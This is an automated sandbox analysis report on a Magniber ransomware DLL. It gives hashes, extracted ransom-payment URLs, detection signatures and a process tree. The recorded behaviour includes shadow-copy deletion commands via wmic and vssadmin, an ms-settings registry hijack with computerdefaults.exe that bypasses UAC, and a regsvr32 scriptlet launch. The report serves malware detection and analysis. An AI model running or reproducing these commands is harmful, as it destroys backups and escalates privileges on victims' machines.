Analysis
-
max time kernel
145s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
24-12-2023 14:23
Static task
static1
Behavioral task
behavioral1
Sample
009aaaf3b4f3a34b662cb9d27fb4409d.dll
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
009aaaf3b4f3a34b662cb9d27fb4409d.dll
Resource
win10v2004-20231222-en
General
-
Target
009aaaf3b4f3a34b662cb9d27fb4409d.dll
-
Size
39KB
-
MD5
009aaaf3b4f3a34b662cb9d27fb4409d
-
SHA1
ac5bfd05ec67090c4f7180519628328e29f3f39a
-
SHA256
2b474cca6c5ff5e1d435d91694b4436876901e3be9c63c3a1d76ff3dbc432017
-
SHA512
50973c3ac2849c8664d74d7efc07fcb0a43260d05030fa7772f135cf716357d522309e70d7ba4ee51cd44ea7a3c711b321221b33ab192ccce6ee71dceb527aea
-
SSDEEP
768:QJvL0rvzhHm06R0Zd+01mV0kgMazfo269xnWf77/KrkVPe4kQKNNJ7kIGsp9C88K:q0rvzhV6Ra+01Y0dMio39xWDrKrkVm4i
Malware Config
Extracted
C:\Users\Admin\Pictures\readme.txt
magniber
http://24e870181848369088sgokwyejx.yeipgu36oui5z4yvck5w6d252oo3h7ktcsxvs3m2wac6ezmti2iotzad.onion/sgokwyejx
http://24e870181848369088sgokwyejx.actmake.site/sgokwyejx
http://24e870181848369088sgokwyejx.bearsat.space/sgokwyejx
http://24e870181848369088sgokwyejx.mixedon.xyz/sgokwyejx
http://24e870181848369088sgokwyejx.spiteor.space/sgokwyejx
Signatures
-
Detect magniber ransomware 2 IoCs
resource yara_rule behavioral2/memory/4784-0-0x000001DA95900000-0x000001DA95C3A000-memory.dmp family_magniber behavioral2/memory/2452-82-0x000002291F720000-0x000002291F724000-memory.dmp family_magniber -
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 20 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5084 1040 vssadmin.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4444 1040 cmd.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3920 1040 cmd.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3552 1040 vssadmin.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1424 1040 vssadmin.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2140 1040 vssadmin.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1424 1040 cmd.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4124 1040 cmd.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1596 1040 vssadmin.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1448 1040 vssadmin.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4424 1040 vssadmin.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1368 1040 cmd.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4372 1040 cmd.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3068 1040 vssadmin.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 640 1040 vssadmin.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4964 1040 cmd.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4564 1040 vssadmin.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2384 1040 cmd.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4500 1040 vssadmin.exe 94 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4632 1040 vssadmin.exe 94 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (80) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 4784 set thread context of 2452 4784 rundll32.exe 54 PID 4784 set thread context of 2464 4784 rundll32.exe 53 PID 4784 set thread context of 2604 4784 rundll32.exe 50 PID 4784 set thread context of 3492 4784 rundll32.exe 39 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Interacts with shadow copies 2 TTPs 12 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5084 vssadmin.exe 1424 vssadmin.exe 1596 vssadmin.exe 1448 vssadmin.exe 4500 vssadmin.exe 3552 vssadmin.exe 2140 vssadmin.exe 4424 vssadmin.exe 3068 vssadmin.exe 640 vssadmin.exe 4564 vssadmin.exe 4632 vssadmin.exe -
Modifies registry class 20 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" svchost.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open\command taskhostw.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" taskhostw.exe Set value (int) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open\command Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open\command sihost.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open\command svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt" sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" taskhostw.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" svchost.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings sihost.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\ms-settings\shell sihost.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 4940 notepad.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4784 rundll32.exe 4784 rundll32.exe 3020 msedge.exe 3020 msedge.exe 4452 msedge.exe 4452 msedge.exe 968 identity_helper.exe 968 identity_helper.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 4784 rundll32.exe 4784 rundll32.exe 4784 rundll32.exe 4784 rundll32.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1748 wmic.exe Token: SeSecurityPrivilege 1748 wmic.exe Token: SeTakeOwnershipPrivilege 1748 wmic.exe Token: SeLoadDriverPrivilege 1748 wmic.exe Token: SeSystemProfilePrivilege 1748 wmic.exe Token: SeSystemtimePrivilege 1748 wmic.exe Token: SeProfSingleProcessPrivilege 1748 wmic.exe Token: SeIncBasePriorityPrivilege 1748 wmic.exe Token: SeCreatePagefilePrivilege 1748 wmic.exe Token: SeBackupPrivilege 1748 wmic.exe Token: SeRestorePrivilege 1748 wmic.exe Token: SeShutdownPrivilege 1748 wmic.exe Token: SeDebugPrivilege 1748 wmic.exe Token: SeSystemEnvironmentPrivilege 1748 wmic.exe Token: SeRemoteShutdownPrivilege 1748 wmic.exe Token: SeUndockPrivilege 1748 wmic.exe Token: SeManageVolumePrivilege 1748 wmic.exe Token: 33 1748 wmic.exe Token: 34 1748 wmic.exe Token: 35 1748 wmic.exe Token: 36 1748 wmic.exe Token: SeIncreaseQuotaPrivilege 3904 WMIC.exe Token: SeSecurityPrivilege 3904 WMIC.exe Token: SeTakeOwnershipPrivilege 3904 WMIC.exe Token: SeLoadDriverPrivilege 3904 WMIC.exe Token: SeSystemProfilePrivilege 3904 WMIC.exe Token: SeSystemtimePrivilege 3904 WMIC.exe Token: SeProfSingleProcessPrivilege 3904 WMIC.exe Token: SeIncBasePriorityPrivilege 3904 WMIC.exe Token: SeCreatePagefilePrivilege 3904 WMIC.exe Token: SeBackupPrivilege 3904 WMIC.exe Token: SeRestorePrivilege 3904 WMIC.exe Token: SeShutdownPrivilege 3904 WMIC.exe Token: SeDebugPrivilege 3904 WMIC.exe Token: SeSystemEnvironmentPrivilege 3904 WMIC.exe Token: SeRemoteShutdownPrivilege 3904 WMIC.exe Token: SeUndockPrivilege 3904 WMIC.exe Token: SeManageVolumePrivilege 3904 WMIC.exe Token: 33 3904 WMIC.exe Token: 34 3904 WMIC.exe Token: 35 3904 WMIC.exe Token: 36 3904 WMIC.exe Token: SeIncreaseQuotaPrivilege 3888 WMIC.exe Token: SeSecurityPrivilege 3888 WMIC.exe Token: SeTakeOwnershipPrivilege 3888 WMIC.exe Token: SeLoadDriverPrivilege 3888 WMIC.exe Token: SeSystemProfilePrivilege 3888 WMIC.exe Token: SeSystemtimePrivilege 3888 WMIC.exe Token: SeProfSingleProcessPrivilege 3888 WMIC.exe Token: SeIncBasePriorityPrivilege 3888 WMIC.exe Token: SeCreatePagefilePrivilege 3888 WMIC.exe Token: SeBackupPrivilege 3888 WMIC.exe Token: SeRestorePrivilege 3888 WMIC.exe Token: SeShutdownPrivilege 3888 WMIC.exe Token: SeDebugPrivilege 3888 WMIC.exe Token: SeSystemEnvironmentPrivilege 3888 WMIC.exe Token: SeRemoteShutdownPrivilege 3888 WMIC.exe Token: SeUndockPrivilege 3888 WMIC.exe Token: SeManageVolumePrivilege 3888 WMIC.exe Token: 33 3888 WMIC.exe Token: 34 3888 WMIC.exe Token: 35 3888 WMIC.exe Token: 36 3888 WMIC.exe Token: SeIncreaseQuotaPrivilege 1748 wmic.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe 4452 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2452 wrote to memory of 4940 2452 sihost.exe 95 PID 2452 wrote to memory of 4940 2452 sihost.exe 95 PID 2452 wrote to memory of 2340 2452 sihost.exe 96 PID 2452 wrote to memory of 2340 2452 sihost.exe 96 PID 2452 wrote to memory of 1748 2452 sihost.exe 103 PID 2452 wrote to memory of 1748 2452 sihost.exe 103 PID 2452 wrote to memory of 2172 2452 sihost.exe 101 PID 2452 wrote to memory of 2172 2452 sihost.exe 101 PID 2452 wrote to memory of 4676 2452 sihost.exe 131 PID 2452 wrote to memory of 4676 2452 sihost.exe 131 PID 4676 wrote to memory of 3904 4676 msedge.exe 106 PID 4676 wrote to memory of 3904 4676 msedge.exe 106 PID 2172 wrote to memory of 3888 2172 cmd.exe 105 PID 2172 wrote to memory of 3888 2172 cmd.exe 105 PID 3920 wrote to memory of 3104 3920 cmd.exe 112 PID 3920 wrote to memory of 3104 3920 cmd.exe 112 PID 4444 wrote to memory of 1596 4444 cmd.exe 136 PID 4444 wrote to memory of 1596 4444 cmd.exe 136 PID 2340 wrote to memory of 4452 2340 cmd.exe 117 PID 2340 wrote to memory of 4452 2340 cmd.exe 117 PID 4452 wrote to memory of 4520 4452 msedge.exe 118 PID 4452 wrote to memory of 4520 4452 msedge.exe 118 PID 3104 wrote to memory of 4124 3104 ComputerDefaults.exe 121 PID 3104 wrote to memory of 4124 3104 ComputerDefaults.exe 121 PID 1596 wrote to memory of 4484 1596 BackgroundTaskHost.exe 125 PID 1596 wrote to memory of 4484 1596 BackgroundTaskHost.exe 125 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 PID 4452 wrote to memory of 4720 4452 msedge.exe 128 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\009aaaf3b4f3a34b662cb9d27fb4409d.dll,#11⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4784
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
PID:3492 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:1868
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:2344
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:4560
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:4072
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:4416
-
-
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Modifies registry class
PID:2604 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:2748
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:864
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:4212
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:2344
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:2348
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Modifies registry class
PID:2464 -
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵PID:1436
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:2596
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:3628
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:744
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵PID:2344
-
-
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:4940
-
-
C:\Windows\system32\cmd.execmd /c "start http://24e870181848369088sgokwyejx.actmake.site/sgokwyejx^&2^&25276002^&80^&357^&2219041"2⤵
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://24e870181848369088sgokwyejx.actmake.site/sgokwyejx&2&25276002&80&357&22190413⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcf89c46f8,0x7ffcf89c4708,0x7ffcf89c47184⤵PID:4520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:24⤵PID:4720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:84⤵PID:2816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:14⤵PID:2504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:14⤵
- Suspicious use of WriteProcessMemory
PID:4676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:3020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:14⤵PID:3720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4352 /prefetch:14⤵PID:468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:84⤵PID:4376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:14⤵PID:4416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:14⤵PID:1304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:14⤵PID:4764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:14⤵PID:3428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1864 /prefetch:14⤵PID:2296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6939553750411032861,424634480572201877,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:14⤵PID:4268
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵PID:4676
-
